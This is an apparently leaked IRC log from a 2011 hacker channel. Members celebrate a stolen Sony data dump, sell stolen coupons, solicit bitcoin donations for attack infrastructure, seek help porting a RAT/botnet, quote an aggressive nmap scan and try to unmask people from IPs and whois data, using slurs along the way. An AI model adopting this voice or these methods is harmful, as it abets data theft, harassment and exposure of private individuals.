remember that neuron Jun 01 16:23:20 <Sabu> our* Jun 01 16:24:20 <Topiary> nakomis> found something for you Jun 01 16:24:20 <Topiary> <Whirlpool> they log PMs here Jun 01 16:24:21 <Topiary> <nakomis> k Jun 01 16:24:28 <Neuron_> rgr Jun 01 16:24:28 <Topiary> that's what you call a 1337 back-and-forth Jun 01 16:24:31 <Topiary> put that shit in a movie Jun 01 16:24:36 <Neuron_> haha Jun 01 16:25:11 <trollpoll> well, is clear that in #lulzsec channel the half part of them are feds... Jun 01 16:25:26 <Sabu> yup Jun 01 16:25:45 <trollpoll> btw who is nakomis? Jun 01 16:25:48 <trollpoll> lol? Jun 01 16:25:57 <Topiary> some Anonfag

Jun 01 16:25:58 <Sabu> hes some ex-military guy thats "anon" Jun 01 16:26:00 <Sabu> you know Jun 01 16:26:05 <Neuron_> ahh Jun 01 16:26:06 <Sabu> hes marine intelligence right topiary? Jun 01 16:26:08 <Sabu> thats what he told me Jun 01 16:26:11 <Sabu> ex-marine Jun 01 16:26:16 <Topiary> not sure, seen him on TinyChat Jun 01 16:26:22 <Topiary> the person who made that Anon wiki thinks he's w ith us Jun 01 16:26:29 <Sabu> who made that Jun 01 16:26:34 <Topiary> nonynews Jun 01 16:26:40 <Topiary> we got IPs Jun 01 16:26:48 <Topiary> they listed you and nakomis as my "associates" Jun 01 16:27:13 <trollpoll> ok Jun 01 16:28:01 <joepie91> <joepie92>- Whois list of nonyNews Jun 01 16:28:01 <joepie91> <joepie92>- Realname: nonyNews Jun 01 16:28:01 <joepie91> <joepie92>- Hostmask: nonyNews!~anon@server10696 3.santrex.net * Jun 01 16:28:01 <joepie91> <joepie92>- nonyNews is on: #lulzsec Jun 01 16:28:01 <joepie91> <joepie92>- Server: collective.2600.net (Arghhh, Scourge of the seven seas!) Jun 01 16:28:01 <joepie91> <joepie92>- End of /WHOIS list. Jun 01 16:28:41 <Topiary> we're gonna be using that 2600 chan as a way of correlating data from AnonOps' past/wikis Jun 01 16:28:42 <trollpoll> nakomis is the name of a novel character of Kath erine Neville Jun 01 16:28:44 <Topiary> to assess spies Jun 01 16:28:46 <trollpoll> Nakomis Key Jun 01 16:28:49 <trollpoll> and... is a girl. Jun 01 16:28:52 <Topiary> it's a front really Jun 01 16:30:01 <Sabu> this guy fox Jun 01 16:30:04 <Sabu> might be bullshit Jun 01 16:30:11 <Sabu> may even better jester himself Jun 01 16:30:11 * Neuron_ has quit (Ping timeout: 121 seconds) Jun 01 16:30:26 <Topiary> mm Jun 01 16:30:28 <Topiary> crossed my mind Jun 01 16:30:33 <[redacted]> netjester Jun 01 16:31:02 <pwnsauce> I'm being nice to hom Jun 01 16:31:08 <pwnsauce> *him Jun 01 16:31:16 <pwnsauce> going to get ALL his goodies Jun 01 16:31:22 <Topiary> by all means sap shit out of him Jun 01 16:31:29 <Topiary> if he is a spy, he'll do that to gain trust Jun 01 16:31:53 <pwnsauce> exactly Jun 01 16:31:57 <pwnsauce> TBH Jun 01 16:32:09 <pwnsauce> im just goodierping Jun 01 16:34:18 <Sabu> HAHAHHAAHA Jun 01 16:34:20 <Sabu> I JUST FIGUREDO UT Jun 01 16:34:21 <Sabu> WHO HE IS Jun 01 16:34:22 <Sabu> AHAHAHAH Jun 01 16:34:26 <Sabu> Faggot.s Jun 01 16:34:42 <trollpoll> when will the Sony-CTF restart? Jun 01 16:35:04 <pwnsauce> Sabu - tell pl0x Jun 01 16:35:07 <Sabu> dude Jun 01 16:35:09 <Sabu> he fucked up Jun 01 16:35:15 <pwnsauce> yeag I know Jun 01 16:35:18 <Sabu> <@Fox> rob@SECRETFUCKINGLAIR # ~$cat nmapawesomeness Jun 01 16:35:18 <pwnsauce> "rob" Jun 01 16:35:18 <Sabu> <@Fox> nmap -P0 -sS -sV -O -A --defeat-rst-ratelimit -F ip_address Jun 01 16:35:18 <Sabu> <@Fox> The other one is a xerobank VPN set

Jun 01 16:35:18 <Sabu> <Brazil> all I see is a nmap line Jun 01 16:35:18 <Sabu> <@Fox> I'll package up the VPN information here in a few Jun 01 16:35:18 <Sabu> <@also-cocks> this is a superfast nmap string... Jun 01 16:35:18 <Sabu> <@also-cocks> by the looks of it Jun 01 16:35:18 <Sabu> <@Fox> I <3 that string. Jun 01 16:35:18 <Sabu> <@also-cocks> it rm-s the RST limit so it scans faster Jun 01 16:35:18 <Sabu> <@also-cocks> hmmmm Jun 01 16:35:18 <Sabu> <Brazil> rob you still got access to hostgator? Jun 01 16:35:18 <Sabu> <@Fox> lol, I can, but not at this second. Jun 01 16:35:18 <Sabu> <@Fox> por que? Jun 01 16:35:18 <Sabu> <Brazil> they have a few targets I'd like to own :) Jun 01 16:35:21 <pwnsauce> florida Jun 01 16:35:22 <Sabu> ROFL Jun 01 16:35:34 <Sabu> he just admitted oh man Jun 01 16:35:36 <pwnsauce> Sabu - Rob, Florida, Smokes, Jun 01 16:35:36 <Sabu> oh so bad Jun 01 16:35:45 <pwnsauce> pentest cmpany Jun 01 16:35:48 <pwnsauce> who is he? Jun 01 16:35:59 <Sabu> he is founder of hostgater bro Jun 01 16:36:00 <Sabu> lol Jun 01 16:36:06 <joepie91> wat Jun 01 16:36:22 <Sabu> hahahahahah Jun 01 16:36:26 <Sabu> if this is the real rob Jun 01 16:36:29 <Sabu> we have a gold mind Jun 01 16:36:31 <Sabu> mine Jun 01 16:36:48 <pwnsauce> :O Jun 01 16:36:49 <joepie91> wait Jun 01 16:36:49 <joepie91> so Jun 01 16:36:52 <Sabu> I know he's starting to regret coming in here Jun 01 16:36:52 <joepie91> you are talking Jun 01 16:36:54 <Sabu> or rather Jun 01 16:36:55 <trollpoll> hostgator? omg Jun 01 16:36:57 <joepie91> to the founder of hostgator Jun 01 16:36:58 <joepie91> ? Jun 01 16:36:58 <Sabu> hes regretting Jun 01 16:37:02 <Sabu> that I even fucking logged on that irc Jun 01 16:37:07 <Sabu> I figured his whole shit out Jun 01 16:37:08 <Sabu> rofl Jun 01 16:37:18 * joepie91 palmfaces Jun 01 16:40:23 * Disconnected (Remote host closed socket). **** ENDING LOGGING AT Wed Jun 1 16:40:23 2011 **** BEGIN LOGGING AT Thu Jun 2 12:49:34 2011 Jun 02 12:49:34 * Now talking on #pure-elite Jun 02 12:49:34 * Topic for #pure-elite is: pE no leaks respect each o ther research and exploit development++ Jun 02 12:49:34 * Topic for #pure-elite set by Sabu!sabu@netadmin.operatio nfreedom.ru at Thu Jun 2 00:21:58 2011 Jun 02 12:49:38 <[redacted]> hello :] **** ENDING LOGGING AT Thu Jun 2 12:50:54 2011 **** BEGIN LOGGING AT Thu Jun 2 12:50:54 2011 Jun 02 12:55:36 <Topiary> http://lulzsecurity.com/ **** BEGIN LOGGING AT Thu Jun 2 13:25:39 2011 Jun 02 13:25:39 * Now talking on #pure-elite Jun 02 13:25:39 * Topic for #pure-elite is: pE ther research and exploit development++ no leaks respect each o

Jun 02 13:25:39 * Topic for #pure-elite set by Sabu!sabu@netadmin.operatio nfreedom.ru at Thu Jun 2 00:21:58 2011 Jun 02 13:29:51 <Recursion> Topiary: am now, whats up? Jun 02 13:30:12 <Topiary> nothing man, just letting you know thanks for th e Sony dumpage Jun 02 13:30:15 <Topiary> we got it all ready to ship out Jun 02 13:30:20 <Recursion> not a problem Jun 02 13:30:28 <Recursion> I'm still pulling more accounts, btw Jun 02 13:30:44 <Topiary> should be enough Jun 02 13:30:47 <Topiary> we got it all archived/sorted Jun 02 13:31:51 <Recursion> lulzsecurity.com is down :( Jun 02 13:32:06 <Topiary> should be back up Jun 02 13:32:17 <Recursion> 500 Internal Server Error Jun 02 13:32:18 <Recursion> nginx/1.0.4 Jun 02 13:32:39 <hsien> ;/ Jun 02 13:47:41 <joepie92> ^ Jun 02 13:49:28 <Recursion> welp Jun 02 13:49:31 <Recursion> I just puked... Jun 02 13:49:36 <Recursion> no idea why Jun 02 13:50:57 <Neuron> Topiary: lulzsecurity is our site? Jun 02 13:51:10 <Topiary> yeah Jun 02 13:51:19 <Neuron> \o/ Jun 02 13:51:43 <Neuron> ;( sorry Recursion .. Jun 02 13:52:46 <Neuron> Topiary: website is offline Jun 02 13:52:50 <Neuron> no cahced version avalible Jun 02 13:53:19 <Topiary> yarp, our website beast is putting it behind clo udfire Jun 02 13:53:29 <Neuron> whos are website beast? Jun 02 13:54:20 <Recursion> just came up for me Jun 02 13:55:20 <joepie92> works here now Jun 02 13:55:31 <joepie92> cloudflare = win Jun 02 13:55:32 <joepie92> imo Jun 02 13:55:46 <Recursion> also, fucking lul on the Friday song Jun 02 13:55:49 <Recursion> who did this? Jun 02 13:55:54 <Recursion> they deserve mad props. Jun 02 13:57:00 <Topiary> he goes by many names ^_________^ Jun 02 13:57:10 <Topiary> one of them is tflow, in fact all of them are tf low Jun 02 13:57:23 * lol gives channel operator status to [redacted] Neuron Jun 02 13:57:38 <Neuron> still trying to load Jun 02 13:59:02 <Topiary> y so opendns Jun 02 14:21:43 <joepie92> <Topiary>one of them is tflow, in fact all of th em are tflow Jun 02 14:21:44 <joepie92> lol'd Jun 02 14:29:29 <Topiary> site is back up Jun 02 14:31:29 <joepie92> Topiary, where is it hosted? Jun 02 14:31:48 <Topiary> one of our sexy boxes of sex Jun 02 14:31:49 <joepie92> also, pm Jun 02 14:31:52 <Topiary> also cocks Jun 02 14:33:06 * anonny (anonny@HA-qg9.p22.ibfo0m.IP) has joined #pure-el ite Jun 02 14:33:15 * anonny is now known as kl0ps Jun 02 14:33:19 <kl0ps> hello o/ Jun 02 14:34:32 * pwnsauce (pwnsauce@HA-qu1.ba8.pn6gun.IP) has joined #pur e-elite Jun 02 14:35:02 <pwnsauce> hey :D Jun 02 14:35:20 <pwnsauce> Neuron - hows it all workin? Jun 02 14:35:24 <kl0ps> hi pwnsauce Jun 02 14:37:20 <lol> hello pwnsauce hello kl0ps :D Jun 02 14:37:24 <lol> whats new :D?

Jun 02 14:37:43 <kl0ps> whats new? i wanna hug u :D Jun 02 14:37:54 * lol gives channel operator status to kl0ps pwnsauce Jun 02 14:38:18 <lol> \:D/ Jun 02 14:38:35 <kl0ps> \o/ Jun 02 14:39:42 <pwnsauce> hey there :D Jun 02 14:39:58 <pwnsauce> kl0ps... where does I know you from? Jun 02 14:40:00 <pwnsauce> BTW Jun 02 14:40:17 <lol> kl0ps is from #internetfeds :D Jun 02 14:40:22 <pwnsauce> Ah! Jun 02 14:40:26 <Topiary> pwnsauce Jun 02 14:40:26 <pwnsauce> Now I remember!! Jun 02 14:40:28 <kl0ps> yeah :D Jun 02 14:40:34 <pwnsauce> S'up Topiary!! Jun 02 14:40:36 <pwnsauce> BTW Jun 02 14:40:36 <Topiary> http://lulzsecurity.com/ Jun 02 14:40:39 <Topiary> let it flow Jun 02 14:40:41 <Topiary> it tflows back to you Jun 02 14:40:41 <pwnsauce> Onesecc :D Jun 02 14:41:02 <pwnsauce> Onesec im Whoissing that lol Jun 02 14:41:07 <pwnsauce> ill flip if my d0x are on it Jun 02 14:41:12 <joepie92> FUCKING lold @ pastebin tweet Jun 02 14:41:20 <Topiary> haha yep Jun 02 14:41:24 <joepie92> "ohey we don't care you put illegal shit on our servers lol" Jun 02 14:41:32 <Topiary> they really don't give a fuck Jun 02 14:41:34 <joepie92> ahaha Jun 02 14:41:40 <joepie92> be aware that ryan has admin thar though Jun 02 14:41:42 <joepie92> :P Jun 02 14:41:46 <Topiary> oh lordy Jun 02 14:41:56 <joepie92> on the other hand Jun 02 14:42:02 <joepie92> he's probably minecrafting Jun 02 14:42:23 <pwnsauce> LMAO! Jun 02 14:42:29 <pwnsauce> BTW Guys Jun 02 14:42:43 <pwnsauce> I need a good coder, who writes in C++ and under stands VB.NET Jun 02 14:42:55 <pwnsauce> one who is careful and is willing to help on a p roject for us Jun 02 14:43:01 <pwnsauce> PHP skills are a bonus Jun 02 14:43:25 <pwnsauce> I have a VB.net RAT/botnet here, I need to modif y it, improve it, and turn it into C++ Jun 02 14:43:40 <pwnsauce> for a little idea I had that I need to talk to S abu about Jun 02 14:43:58 <Topiary> <proSI> hey sir, are you there? Jun 02 14:43:58 <Topiary> <Whirlpool> word ninja Jun 02 14:43:58 <Topiary> <proSI> I respect you guys a lot and I don't wan t to hide anything to you Jun 02 14:43:58 <Topiary> <proSI> >.> Jun 02 14:43:58 <Topiary> <proSI> so I'm telling you this Jun 02 14:43:58 <Topiary> <proSI> I'm one of them faggot anonymous, atleas t I do the propaganda part for them Jun 02 14:44:02 <joepie92> I understand VB.net but don't write C++ Jun 02 14:44:02 <Topiary> <proSI> but I'm no hacker n shit Jun 02 14:44:04 <Topiary> <proSI> : Jun 02 14:44:26 <pwnsauce> joepie92 - :D now we need the C++ guy! Jun 02 14:44:29 <joepie92> lol Jun 02 14:44:33 <joepie92> tbh Jun 02 14:44:37 <joepie92> anything you could write in vb.net Jun 02 14:44:42 <joepie92> would probably be just as easy to replicate in C ++ Jun 02 14:44:45 <joepie92> as without an example

Jun 02 14:44:53 <joepie92> -as Jun 02 14:45:21 <joepie92> why am I 92 again Jun 02 14:45:22 <joepie92> o_O Jun 02 14:45:24 * joepie92 is now known as joepie91 Jun 02 14:45:39 <pwnsauce> hmmmmm. thing is, it aint my code im playing wit h. its just ecode to use as a "base" Jun 02 14:45:46 <Topiary> Jester = milw0rm + slowloris + Tor, Python = VB. net + JS, joepie91 + cage = gorilla habitat Jun 02 14:46:07 <joepie91> lolwat Jun 02 14:46:13 <joepie91> that actually took me some time to interpret Jun 02 14:46:30 <pwnsauce> lolwtfbbq?! Jun 02 14:47:00 <joepie91> k guys, I have to work on interpreting Iran emai ls for a bit Jun 02 14:47:02 * joepie91 brb Jun 02 14:47:14 <pwnsauce> kk Jun 02 14:47:29 <pwnsauce> kayla - if you or kl0ps know anyone... Jun 02 14:47:32 <Topiary> Whirlpool> that's cool, how are things going ove r at Anon? Jun 02 14:47:32 <Topiary> <proSI> it's all slow n shit. you are under the spot light these days.. lol so we are keeping it down Jun 02 14:47:32 <Topiary> <proSI> but greece fags are trying to attack IMF Jun 02 14:47:32 <Topiary> <proSI> that's all Jun 02 14:47:32 <Topiary> <proSI> :) Jun 02 14:47:32 <Topiary> <Whirlpool> I hear you guys hacked HBGary Jun 02 14:47:41 * Topiary waits for something no doubt lulzy Jun 02 14:47:51 <pwnsauce> xD Jun 02 14:48:08 <kl0ps> i am sry :( Jun 02 14:48:11 <Topiary> <proSI> yeah. Jun 02 15:08:55 * Disconnected (Invalid argument). **** ENDING LOGGING AT Thu Jun 2 15:08:55 2011 **** BEGIN LOGGING AT Thu Jun 2 15:15:22 2011 Jun 02 15:15:22 * Now talking on #pure-elite Jun 02 15:15:22 * Topic for #pure-elite is: pE no leaks respect each o ther research and exploit development++ Jun 02 15:15:22 * Topic for #pure-elite set by Sabu!sabu@netadmin.operatio nfreedom.ru at Thu Jun 2 00:21:58 2011 Jun 02 15:15:39 <Recursion> hey, when is the leak going to hit? Jun 02 15:15:46 <Neuron> l2 hours Jun 02 15:15:57 * Recursion giggles with anticipation Jun 02 15:15:57 <Recursion> awww Jun 02 15:30:40 * Disconnected (Invalid argument). **** ENDING LOGGING AT Thu Jun 2 15:30:40 2011 **** BEGIN LOGGING AT Thu Jun 2 15:34:10 2011 Jun 02 15:34:10 * Now talking on #pure-elite Jun 02 15:34:10 * Topic for #pure-elite is: pE no leaks respect each o ther research and exploit development++ Jun 02 15:34:10 * Topic for #pure-elite set by Sabu!sabu@netadmin.operatio nfreedom.ru at Thu Jun 2 00:21:58 2011 Jun 02 15:35:09 <joepie91> ye Jun 02 15:35:10 <joepie91> I lold Jun 02 15:35:14 <joepie91> pastebin is like Jun 02 15:35:16 <joepie91> TRAFFIC NOM Jun 02 15:35:21 <trollpoll> hahahah Jun 02 15:35:28 <trollpoll> they love lulz xD Jun 02 15:35:36 <joepie91> and traffic Jun 02 15:35:39 <joepie91> especially traffic

Jun 02 15:35:42 <trollpoll> sure Jun 02 15:35:45 <joepie91> srsly, the owner of pastebin is just as bad as r yan Jun 02 15:35:45 <joepie91> in that Jun 02 15:35:51 <trollpoll> ahahha Jun 02 15:35:53 <joepie91> traffic nom nom nom Jun 02 15:36:06 <trollpoll> r u at 2600? Jun 02 15:36:10 <joepie91> I am, I am Jun 02 15:36:16 <trollpoll> how is the chan now? Jun 02 15:36:22 <trollpoll> hundreds? Jun 02 15:36:32 <joepie91> 110 Jun 02 15:36:35 <trollpoll> omg Jun 02 15:36:47 <trollpoll> im going as "arrrrr" Jun 02 15:36:49 <joepie91> inb4 opers mad Jun 02 15:36:50 <joepie91> lolk Jun 02 15:37:13 <Neuron> joinin 2600! Jun 02 15:39:37 <Neuron> op captainjack Jun 02 15:41:01 <joepie91> <Whirlpool>this channel is more successful than 2600 itself Jun 02 15:41:03 <joepie91> I think Jun 02 15:41:05 <joepie91> that is the only reason Jun 02 15:41:09 <joepie91> we haven't been booted yet Jun 02 15:41:11 <joepie91> from 2600 Jun 02 15:41:11 <joepie91> lol Jun 02 15:41:15 <trollpoll> hahaha Jun 02 15:41:21 <joepie91> TRAFFIC NOM Jun 02 15:41:22 <joepie91> lol Jun 02 15:41:26 <Neuron> op CaptainJack! :P Jun 02 15:47:18 <Sabu> 2600 liks them sex Jun 02 15:47:32 <Neuron> lol yup Jun 02 15:52:11 <hsien> how many people are there? Jun 02 15:52:30 <Neuron> 114 Jun 02 15:52:33 <Neuron> join the lulz Jun 02 15:52:36 <Neuron> pick a pirate name Jun 02 15:55:15 <joepie91> I'm sort of tempted Jun 02 15:55:17 <joepie91> to pick a pirate name Jun 02 15:55:22 <joepie91> but that might blow a potential cover Jun 02 15:55:22 <joepie91> lol Jun 02 15:56:49 <hsien> lol k can i be johnny depp? Jun 02 15:57:02 <hsien> hes a pirate right? Jun 02 15:58:27 <trollpoll> i have a very good name of pirate Jun 02 15:58:28 <trollpoll> Jammie Thomas-Rasset Jun 02 15:58:30 <trollpoll> xDDDDD Jun 02 15:58:51 <Recursion> who the fuck is ShadowDXS? Jun 02 15:59:09 <Neuron> guy from anonops hes cool Jun 02 15:59:23 <joepie91> mk Jun 02 15:59:24 <Recursion> ok Jun 02 15:59:24 <Recursion> lol Jun 02 15:59:29 <joepie91> I estimate to have dinged a few xchat clients Jun 02 15:59:31 <joepie91> with that bell character Jun 02 15:59:32 <joepie91> :D Jun 02 16:03:12 <Neuron> how long till drop? Jun 02 16:05:18 <Neuron> make sure to post your bitcoin address to :P Jun 02 16:11:24 <trollpoll> btw Jun 02 16:11:40 <trollpoll> did you read the NATO doc about anonymous? Jun 02 16:11:51 <trollpoll> they will put tanks on our houses???? Jun 02 16:12:14 <trollpoll> http://www.thinq.co.uk/2011/6/1/nato-report-thre atens-persecute-anonymous/ Jun 02 16:12:26 <Neuron> lol Jun 02 16:15:00 <joepie91> lol

Jun 02 16:15:03 <joepie91> post bitcoin address Jun 02 16:15:03 <joepie91> kgo Jun 02 16:15:08 <joepie91> in #lulzsec Jun 02 16:15:14 <joepie91> Topiary Jun 02 16:15:15 <joepie91> fgt Jun 02 16:15:20 <joepie91> post bitcoin address kgo Jun 02 16:16:38 <Topiary> okay Jun 02 16:16:54 <Neuron> we need pastehtml and pastebin single leaks :D Jun 02 16:17:37 <[redacted]> they will put tanks in our houses Jun 02 16:17:43 <[redacted]> we will put penis's in their mouths Jun 02 16:18:26 <lol> Obama will be like "lol you just ddos my server?" *nuke* Jun 02 16:22:17 <pwnsauce> LOL Jun 02 16:22:33 <joepie91> just wondering Jun 02 16:22:34 <joepie91> is that data Jun 02 16:22:36 <joepie91> actual PSN data? Jun 02 16:22:56 <joepie91> because I thought the web services were decouple d from PSN Jun 02 16:23:06 <trollpoll> guys, you are epic Jun 02 16:27:22 <Neuron> did someone post a bitcoin address? Jun 02 16:27:25 <joepie91> is "kardus" one of you? Jun 02 16:27:27 <joepie91> and no, noone did Jun 02 16:27:28 <joepie91> -_Jun 02 16:27:31 <Neuron> joepie91: Jun 02 16:27:33 <Neuron> post Jun 02 16:27:33 <Neuron> :P Jun 02 16:27:36 <Neuron> or i will Jun 02 16:27:38 <joepie91> lemme make an address Jun 02 16:27:41 <Neuron> kk Jun 02 16:27:42 <Recursion> http://www.reddit.com/r/netsec/comments/hq6xq/lu lzsec_compromises_sony_again_twitter/ Jun 02 16:27:43 <Recursion> :D Jun 02 16:27:48 <Neuron> lmfao Jun 02 16:27:53 <joepie91> 1BUYwuagdWXnvBaPdTmu25cztifFLAJHXw Jun 02 16:27:55 <joepie91> kgo Jun 02 16:28:03 <Recursion> I know a kardus.... Jun 02 16:28:03 <joepie91> look at it in blockexplorer to see how much you got Jun 02 16:28:04 <joepie91> :D Jun 02 16:28:16 <Recursion> from partyvan.fm Jun 02 16:28:19 <Recursion> like, years ago Jun 02 16:29:23 <Neuron> joepie91: there you go people are starting to do nate Jun 02 16:29:42 <joepie91> seeing first one Jun 02 16:29:57 <Neuron> joepie91: we will use whatevers donated for shel ls or some shit. or send them to sabu for later use Jun 02 16:30:08 <joepie91> ya Jun 02 16:30:11 <joepie91> I'll forward all of it Jun 02 16:30:13 <joepie91> to one of you guys Jun 02 16:30:28 <joepie91> or Topiary or sth Jun 02 16:30:32 <joepie91> I think he did bitcoin stuff Jun 02 16:30:33 <joepie91> so far Jun 02 16:31:05 <Neuron> yeah Jun 02 16:31:59 <Neuron> Sabu: Op me so i can get donations plox Jun 02 16:32:26 <Topiary> 1Ahou81cHECe2nBWYSAiwbCMg5aQB9Gh2a Jun 02 16:32:30 <Topiary> is our bitcoin Jun 02 16:33:10 <Neuron> whoop late for that Jun 02 16:33:22 <Neuron> Topiary: loging and op and post it Jun 02 16:33:37 <joepie91> I'll forward the 0.04 Jun 02 16:33:38 <joepie91> 1 sec Jun 02 16:33:39 <Neuron> Op me if you can

Jun 02 16:34:01 <joepie91> Topiary, the 0.04 that came in on my address is coming your way :P Jun 02 16:34:11 <Sabu> hopefully we get some good donations Jun 02 16:34:16 <Sabu> so we can buy more vpns and shit Jun 02 16:34:24 <Neuron> yup Jun 02 16:34:24 <joepie91> be sure to op all lulzsec people Jun 02 16:34:25 <Neuron> \o/ Jun 02 16:34:27 <joepie91> in #lulzsec Jun 02 16:34:28 <Topiary> oh lawdy Jun 02 16:34:35 <joepie91> prevents confusion Jun 02 16:34:38 <Neuron> yeah its kinda hard when people are pming asking why your not opped :P Jun 02 16:34:38 <Topiary> okay call yourselves out with "scurvy" right now Jun 02 16:34:50 <Sabu> no one talk in 2600 just focus here Jun 02 16:34:53 <Sabu> let everyone go crazy Jun 02 16:35:24 * Recursion_ (gibby@HA-b7o.3p2.0g9blo.IP) has joined #pure -elite Jun 02 16:35:30 <Recursion_> thats weird Jun 02 16:35:40 <Recursion_> hey, Sabu, or an IRC op Jun 02 16:35:48 <Recursion_> can you /kill Recursion Jun 02 16:35:49 <Neuron> haha Sabu hows the traffic? Jun 02 16:36:21 <joepie91> <kardus>implying they aren't already shitting ho uses from the last 10 sites compromised ? Jun 02 16:36:21 <joepie91> <kardus>with another 2 about to be released soon ? Jun 02 16:36:21 <joepie91> <kardus>:P Jun 02 16:36:34 <joepie91> <kardus>didn't even find out where to use the co upons yet Jun 02 16:36:34 <joepie91> <kardus>didn't work with their music store or th eir amazon link thing Jun 02 16:36:51 <joepie91> <kardus>they are valid coupons, it checks agains t the amazon database and says it's valid, they just dont work for some reason Jun 02 16:36:52 <joepie91> <kardus>nah Jun 02 16:36:52 <joepie91> <kardus>tried a week ago Jun 02 16:36:52 <joepie91> <sanchaz>kardus: was this realeased a week ago? Jun 02 16:36:52 <joepie91> <kardus>and while the db was being dumped new en tries were being added Jun 02 16:36:52 <joepie91> <kardus>nope Jun 02 16:36:52 <joepie91> <kardus>well, not to the public Jun 02 16:37:07 <joepie91> <sanchaz>u part of lulz? Jun 02 16:37:08 <joepie91> <kardus>i'm neither here nor there Jun 02 16:37:08 <joepie91> <kardus>sir Jun 02 16:37:24 <Neuron> who is kardus? Jun 02 16:37:37 <trollpoll> and where is talking? Jun 02 16:38:22 <joepie91> #Frantech Jun 02 16:38:23 <joepie91> on dairc Jun 02 16:38:31 <joepie91> I am wondering who he is too Jun 02 16:38:37 <joepie91> Sabu ding Jun 02 16:38:39 <Sabu> hi Jun 02 16:38:42 <joepie91> read above Jun 02 16:38:52 <Sabu> I think thats kaylas friend she gave someone some coupon s Jun 02 16:39:00 <Sabu> if hes talking publicly Jun 02 16:39:04 <Sabu> kayla will talk to him Jun 02 16:39:17 <joepie91> it's #Frantech Jun 02 16:39:19 <joepie91> on Dairc Jun 02 16:39:22 <joepie91> aka buyvm Jun 02 16:39:31 <Sabu> aka kayla/lol and paste her log Jun 02 16:39:34 <Sabu> if its her friend Jun 02 16:39:47 <trollpoll> hmm... guys you are everywhere.. :S

Jun 02 16:39:48 <Recursion_> Sabu: are you an IRCop? Jun 02 16:39:58 * joepie91 doubts she has "lol" on highlight Jun 02 16:40:03 <Recursion_> lol Jun 02 16:40:07 <Recursion_> >.> Jun 02 16:40:16 <joepie91> trollpoll: I am connected to like 13 networks at m Jun 02 16:40:21 <Recursion_> also, joepie91, where is Kardus? Jun 02 16:40:24 <trollpoll> omg Jun 02 16:40:30 <Recursion_> err Jun 02 16:40:30 <joepie91> sometimes up to 25 networks Jun 02 16:40:31 <Topiary> http://twitter.com/#!/aaronbarr/status/763873433 50759424 Jun 02 16:40:34 <Recursion_> joepie91: rather Jun 02 16:40:37 <joepie91> I tend to keep an eye on channels everywhere Jun 02 16:40:38 <trollpoll> do you have 6 hands? Jun 02 16:40:40 <joepie91> lol Jun 02 16:40:43 <joepie91> I just have a good client :) Jun 02 16:41:11 * joepie91 lols at aaron barr tweet Jun 02 16:41:24 <trollpoll> Neuron, im jt-rasset XD Jun 02 16:41:50 <joepie91> Recursion Jun 02 16:41:54 <joepie91> dairc Jun 02 16:41:57 <joepie91> #frantech Jun 02 16:42:00 <joepie91> the buyvm/frantech channel Jun 02 16:42:05 <joepie91> irc.dairc.net Jun 02 16:42:34 <Neuron> talking to a member in there Jun 02 16:42:46 <Neuron> who claims to ahve secdev.net's source code hes donating under the condition it never goes public Jun 02 16:42:59 <Recursion_> tell him an IRC op from partyvan says hello Jun 02 16:43:00 <Recursion_> :P Jun 02 16:44:02 <Sabu> hahhahhahahahah Jun 02 16:44:08 <Sabu> aaron barr tweeted Jun 02 16:44:09 <Sabu> oh man Jun 02 16:44:12 <joepie91> btw, http://anonbooks.strangled.net/File%20Mirro rs/ Jun 02 16:44:17 <joepie91> got the .tar.bz2 there Jun 02 16:44:20 <joepie91> it's not going anywhere Jun 02 16:44:21 <joepie91> :) Jun 02 16:44:29 <joepie91> so feel free to link if needed Jun 02 16:44:32 <Topiary> 176LRX4WRWD5LWDMbhr94ptb2MW9varCZP Jun 02 16:44:35 <Topiary> that's our new one by the way Jun 02 16:44:42 <Topiary> I accidentally hit F5 and it generated a new one Jun 02 16:44:57 <lol> yeh he's the guy who was testing the coupons when i said we could get them sold he was going to sell them for us and i gave him some to test Jun 02 16:44:57 <lol> i even mentioned it here :D Jun 02 16:45:11 <Neuron> ahh ok Jun 02 16:45:51 <joepie91> Topiary: you using a web wallet? Jun 02 16:46:06 <joepie91> lol: ah, might be better to not have him talking about it in public though, lol Jun 02 16:46:12 <joepie91> *especially* not in #Frantech Jun 02 16:46:24 <Topiary> yeah web wallet Jun 02 16:46:33 <lol> yeh :D Jun 02 16:46:46 <joepie91> http://webcache.googleusercontent.com/search?q=c ache:S5x09jlf1ogJ:forum.bitcoin.org/index.php%3Ftopic%3D10483.new&hl=en&strip=1 Jun 02 16:46:51 <Recursion_> jesus, is that kid still in the hospital? Jun 02 16:46:56 <joepie91> this was just posted in #Frantech Jun 02 16:46:57 <lol> but it's technically on his own back because he knows no one in this channel :P Jun 02 16:46:58 <lol> he got them from me Jun 02 16:47:06 <Recursion_> I think he managed to put IRSSI on his heart mon

itor or something Jun 02 16:47:06 <joepie91> <vld>http://webcache.googleusercontent.com/searc h?q=cache:S5x09jlf1ogJ:forum.bitcoin.org/index.php%3Ftopic%3D10483.new&hl=en&str ip=1 Jun 02 16:47:07 <joepie91> <vld>ewww Jun 02 16:47:13 <joepie91> it's a sales thread for the coupons... Jun 02 16:47:23 <joepie91> Recursion_: who? Jun 02 16:47:54 <Recursion_> Kardus Jun 02 16:47:54 <Recursion_> lol Jun 02 16:48:20 <Neuron> Sabu: im getting the http://secdev.net code Jun 02 16:48:40 <joepie91> idk who he is Jun 02 16:48:40 <joepie91> lol Jun 02 16:48:49 <Recursion_> I used to have DOX on him Jun 02 16:48:51 <Neuron> ill verify Jun 02 16:48:52 * Recursion_ shrugs Jun 02 16:49:00 <Sabu> ok Jun 02 16:49:05 <Sabu> guys Jun 02 16:49:07 <Sabu> neruon etc Jun 02 16:49:10 <Recursion_> whaddap? Jun 02 16:49:13 <trollpoll> <anonymous> But yeah, my good friend broke into ebay and has on ransom about 30 million ebay accounts with all info (paypal, use rnames, hashed passwords, paypal plaintext passwords, etc) Jun 02 16:49:14 <Sabu> I don't have to say this more than one I hope Jun 02 16:49:30 <Sabu> but people on 2600 are not your friends 95% are there to social engineer you Jun 02 16:49:35 <Sabu> to analyze how you talk Jun 02 16:49:36 <Neuron> aye i realize this Jun 02 16:49:39 <Sabu> and make connections Jun 02 16:49:44 <Sabu> I am just reminding you Jun 02 16:49:55 <Recursion_> this is the reason why I either dont talk, or I talk completely differently. Jun 02 16:49:56 <Sabu> don't go off and befriend any of them Jun 02 16:49:57 <Neuron> http://reflets.info/sony-takedown-nouvelle-fuite -de-donnees-un-million-de-comptes-utilisateurs-dans-la-nature/ << first news pos t Jun 02 16:50:01 <Sabu> if they message you with info Jun 02 16:50:09 <trollpoll> yes, pretty sure, thats why i dont talk so much , because of my poor english xDDD 